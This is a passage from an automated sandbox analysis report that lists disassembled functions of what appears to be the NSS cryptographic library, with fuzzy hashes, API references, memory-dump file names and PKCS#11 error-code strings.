Opcode Fuzzy Hash: 1e4f95ab365a14b1137d9dae2c6b051497154607b00ed10cdcb0dd89ac3de39e
Instruction Fuzzy Hash: E1719A72F002114BEB14CE6CCC9039A77A29F81354F294339CC69EBBC6EA719C468BD1

Function 6C523EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON

Download Yara Rule

Strings

sqlite_temp_master, xrefs: 6C52460F
sqlite_, xrefs: 6C523FAA, 6C524185
sqlite_master, xrefs: 6C52463F

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID:
String ID: sqlite_$sqlite_master$sqlite_temp_master
API String ID: 0-4221611869
Opcode ID: 1808546cbfd3ab25a89d2b8bedc0544734a9b5524702ab88235e28a6d8b8778e
Instruction ID: 3c5e91ac022bcac69e63f0c4c04b8dd54f7b9af3e0fa3963838e6a7d1e3c8a49
Opcode Fuzzy Hash: 1808546cbfd3ab25a89d2b8bedc0544734a9b5524702ab88235e28a6d8b8778e
Instruction Fuzzy Hash: 27225B31B491954FEB05CF6588606B67BF2AF46318F284998C9E19FBC2C72EEC41C794

Function 6C65BE70 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 1029COMMON

Download Yara Rule

Strings

`, xrefs: 6C65C0B6

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 0dff1babe52c630064860462ce9f24585fbceb8e59592d6bd38b6f140e633a51
Instruction ID: 52d2495d19373d67af5c8dac3118a290cb593e8b7a718761c0f566305870536f
Opcode Fuzzy Hash: 0dff1babe52c630064860462ce9f24585fbceb8e59592d6bd38b6f140e633a51
Instruction Fuzzy Hash: CF927F74A002099FDB15DF54C890BAEB7F2FF88308F684168D416ABB91D736EC66CB54

Function 6C4F3D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

htonl.WSOCK32(00000000), ref: 6C4F3EA9

Strings

0, xrefs: 6C4F3DAB

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: htonl
String ID: 0
API String ID: 2009864989-4108050209
Opcode ID: d8078438580c6a6d8c8b7fd3f90b5434d1c4ba0268a73a18939c203c7beb35c2
Instruction ID: 3f9ffb32d89c687bddc4b8d2314b1e659d15f71236d47dd41143722cded276e6
Opcode Fuzzy Hash: d8078438580c6a6d8c8b7fd3f90b5434d1c4ba0268a73a18939c203c7beb35c2
Instruction Fuzzy Hash: A3512631E490798AEB16C67D8860FFEBBB19FC2315F184329C5B5A7BC0C624454B87A2

Function 6C59EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C59F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C59F0F9

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 45c2811f70daba6d1b57ea54737939512c9c66364e99031edc4ee6bd8a58add8
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: 76919D71A0025A8BCB14CF68CC916AEB7F1FF85324F24476DE966A7B80D730A905CB91

Function 6C5C2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C5E7929), ref: 6C5C2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C5E7929), ref: 6C5C2FE0

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: 432d7d1ae4f5af925239bdf4c593e169de5b214bae3aa29f43d5eb3cc70cdb12
Instruction ID: 8b15d8cb5f3eb3a3a7bf498496581653d2f88ecfec44d2c5eaac6784da0b570f
Opcode Fuzzy Hash: 432d7d1ae4f5af925239bdf4c593e169de5b214bae3aa29f43d5eb3cc70cdb12
Instruction Fuzzy Hash: 7751CE72B049198FD710CED9CC80AAA73B1FF85318F29456DD909ABB11D735E946CB83

Function 6C5CED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C5CEE3D

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: e2f0967bf3f340a7f132cf52330837dbd97e0b891fb13abc9538dd8aaf4c2ef7
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: F071E272F017058FD718CF99C88166ABBF2AB88304F15862DD85697B91D7B0E940CB92

Function 6C63AE71 Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 6C63AE8A

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 963aa74062308536f456f84c0efed837b356f8ea0ccdbc3c84a40502403cea0e
Instruction ID: 5faec1abc5fb5a3e77c97e4405b7bbe092a2bc4c88a68cac9151082af5f0f260
Opcode Fuzzy Hash: 963aa74062308536f456f84c0efed837b356f8ea0ccdbc3c84a40502403cea0e
Instruction Fuzzy Hash: 044181B1A052158BEF11CF96C9C179ABBF4FB49304F20946ED419EB241D374AA44CFA8

Function 6C4F5F30 Relevance: 1.6, APIs: 1, Instructions: 350stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6C4F6013

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: 3dae246abc32ed08d42dbd99a071cf3255267797b77c30be4324ab4667cc8135
Instruction ID: f01f0ccb419eaceca268bba102165d62f80894eb3ddb7677d3008859c02fe2f2
Opcode Fuzzy Hash: 3dae246abc32ed08d42dbd99a071cf3255267797b77c30be4324ab4667cc8135
Instruction Fuzzy Hash: F3C1E670A045068BEB04CF59C850FEAB7B2AFC5319F648269D9B5D7B42D731E843C7A0

Function 6C685E60 Relevance: 1.4, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 6C685B90: PR_Lock.NSS3(00010000,?,00000000,?,6C56DF9B), ref: 6C685B9E
Part of subcall function 6C685B90: PR_Unlock.NSS3 ref: 6C685BEA

memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6C685E23,6C56E154), ref: 6C685EBF

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: LockUnlockmemset
String ID:
API String ID: 1725470033-0
Opcode ID: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction ID: 7507c011f5bf03cf47533795dbaae8e768c89ae64169651b2521fbadd6f688b4
Opcode Fuzzy Hash: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction Fuzzy Hash: 9F51BD72E0121A8FDB18CF59C8816AEF3B2FF88314B19456DD816B7745D730E901CBA4

Function 6C63DCD0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9af80e0396f35fe0456298dd42a3ba2f4dccd96eddfacba4fe746514134634ba
Instruction ID: 1f17ee62d30b242614fb4010e87da0049df1522e1de535642aae172af1c9c867
Opcode Fuzzy Hash: 9af80e0396f35fe0456298dd42a3ba2f4dccd96eddfacba4fe746514134634ba
Instruction Fuzzy Hash: 96F14C71A01215CFDB08CF19C880BAA77B2BF89314F29A169D8099F751CB35ED52CBE5

Function 6C5D1DC0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction ID: a2b5ce17f8e98e3703d56c7626db3efa384d0cfd278952423c9be485d6f48e55
Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction Fuzzy Hash: 75D13572A057568BEB118E1CCC843DA7B63AB85338F1A4728D8641BBC6C37ABD05C7D5

Function 6C568EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3feeb97729c732bfef6c6ffe41397e9a652db04d25b3c416405b114b44cdd397
Instruction ID: 637362edac6fc53946597c0c2b4a109952070223f1c98c17fcab149477f40e6f
Opcode Fuzzy Hash: 3feeb97729c732bfef6c6ffe41397e9a652db04d25b3c416405b114b44cdd397
Instruction Fuzzy Hash: AD119D32A002158BD714CF26DC84B5AB3B5BF42318F04466AD8158FE61C775EC86C7C6

Function 6C640C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15185e3bd59acdad070f3357c7d748649db143ed96327ef0680db96c083ea0d7
Instruction ID: e48d14850dbd6b2e38b1a8137b41ed61d4a8fdbdc99c9a4c711408a0e8300490
Opcode Fuzzy Hash: 15185e3bd59acdad070f3357c7d748649db143ed96327ef0680db96c083ea0d7
Instruction Fuzzy Hash: 6D11BC79704255CFCB00DF29C880AAA77A2FF85368F14C06DD8298B701DB71E8068BA4

Function 6C5B3FF0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Error
String ID:
API String ID: 2275178025-0
Opcode ID: d9e7549497b8115affe4428d4bfa561848a79ef2733ade42b4d647b5cf4d2ff0
Instruction ID: 0418fbf29c6a1fe5e731e5d47a911c420e1c2ef427070f42d3b688bb32cfa85d
Opcode Fuzzy Hash: d9e7549497b8115affe4428d4bfa561848a79ef2733ade42b4d647b5cf4d2ff0
Instruction Fuzzy Hash: 76F0BE70A007599BCB00DF29C49119AB7F4EF49244F009219EC8AAB300EB30AAC4C7C5

Function 6C640D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: d57680fbbb67e4c5c4c234ae5a198295356af55c9c92cf24916147667e61f75f
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 56E06D3A202064A7DB148E09C460AA97399DF92619FA4C079CC599BA01D633F8078B85

Function 6C56CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ec2b34f7ba6ef5c842af8b8b281d35471e082b2e7f2ab397b18bbe2689d3847
Instruction ID: 3a906bd36933817d6f27f3a6d541af2a9eabd6b28c5472facd05b901c2cf452d
Opcode Fuzzy Hash: 8ec2b34f7ba6ef5c842af8b8b281d35471e082b2e7f2ab397b18bbe2689d3847
Instruction Fuzzy Hash: 8FC04838244608CFC704DF0AE4899A43BA8AB09610B044094EA028B721DA61FC00CA84

Function 6C5A1D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6C5A1D46), ref: 6C5A2345

Strings

CKR_STATE_UNSAVEABLE, xrefs: 6C5A2037
CKR_TOKEN_NOT_PRESENT, xrefs: 6C5A1F81
CKR_SAVED_STATE_INVALID, xrefs: 6C5A1E56
CKR_TEMPLATE_INCONSISTENT, xrefs: 6C5A1EE1
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6C5A1F8B
CKR_TEMPLATE_INCOMPLETE, xrefs: 6C5A1F95
CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6C5A232E
CKR_BUFFER_TOO_SMALL, xrefs: 6C5A2183
CKR_OK, xrefs: 6C5A1DFC
CKR_SIGNATURE_INVALID, xrefs: 6C5A20CF
CKR_DEVICE_MEMORY, xrefs: 6C5A1FF3
CKR_OPERATION_ACTIVE, xrefs: 6C5A22B8
CKR_NEW_PIN_MODE, xrefs: 6C5A1E9F
CKR_MUTEX_BAD, xrefs: 6C5A1F49
CKR_INFORMATION_SENSITIVE, xrefs: 6C5A22B1
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6C5A2275
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6C5A2327
CKR_PIN_INCORRECT, xrefs: 6C5A1D92
CKR_OBJECT_HANDLE_INVALID, xrefs: 6C5A204D
CKR_DOMAIN_PARAMS_INVALID, xrefs: 6C5A2015
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6C5A1DE0
CKR_MUTEX_NOT_LOCKED, xrefs: 6C5A2225
CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6C5A22FF
CKR_FUNCTION_CANCELED, xrefs: 6C5A1E73
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6C5A227F
rv = 0x%x, xrefs: 6C5A2312
CKR_DEVICE_ERROR, xrefs: 6C5A229D
CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6C5A2319
CKR_FUNCTION_REJECTED, xrefs: 6C5A2289
CKR_OPERATION_CANCEL_FAILED, xrefs: 6C5A1F77
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6C5A2320
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6C5A1FD7
rv = %s, xrefs: 6C5A2340
CKR_PIN_INVALID, xrefs: 6C5A2057
CKR_RANDOM_NO_RNG, xrefs: 6C5A22A7
CKR_SIGNATURE_LEN_RANGE, xrefs: 6C5A20D9
CKR_FUNCTION_NOT_PARALLEL, xrefs: 6C5A218D
CKR_PIN_LOCKED, xrefs: 6C5A2075
CKR_NEXT_OTP, xrefs: 6C5A222F
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6C5A2293, 6C5A233F
CKR_DEVICE_REMOVED, xrefs: 6C5A2261
CKR_PIN_EXPIRED, xrefs: 6C5A206B
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6C5A226B
CKR_PIN_LEN_RANGE, xrefs: 6C5A2061
CKR_WRAPPED_KEY_INVALID, xrefs: 6C5A1FB5
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6C5A1F0F
CKR_CURVE_NOT_SUPPORTED, xrefs: 6C5A2179

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Print
